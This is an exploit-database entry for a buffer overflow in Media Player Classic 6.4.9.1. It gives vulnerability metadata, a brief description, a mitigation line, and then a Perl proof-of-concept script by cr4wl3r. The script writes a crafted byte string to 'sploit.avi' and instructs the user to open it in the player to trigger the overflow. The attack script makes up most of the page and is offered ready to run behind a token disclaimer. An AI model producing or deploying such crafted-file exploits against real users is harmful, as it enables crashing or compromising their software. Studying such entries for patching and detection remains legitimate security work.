Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit

vendor:

Media Player Classic

by:

cr4wl3r

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Media Player Classic

Affected Version From: 6.4.9.1

Affected Version To: 6.4.9.1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

Unknown

Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit

This exploit is for Media Player Classic 6.4.9.1 (.avi) which is a media player for Windows. The exploit is coded by cr4wl3r and it is a buffer overflow exploit. It creates a malicious .avi file which when opened with Media Player Classic, can cause a buffer overflow.

Mitigation:

Update to the latest version of Media Player Classic and use a reliable antivirus software to detect malicious files.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit
# Homepage: http://www.sourceforge.net/projects/guliverkli2/
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
#             that is not in the intention of the reader to use them in order to bring
#             to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks



print "
[+]--------------------------------------------------------------[+]
[+] Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit  [+]
[+] By : cr4wl3r                                                 [+]
[+]--------------------------------------------------------------[+]
";


$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

open(file, "> sploit.avi");
print (file $buff);
print "\n\n[+] Done!\n
[+] Open with Media Player Classic\n
[+] Coded by cr4wl3r\n";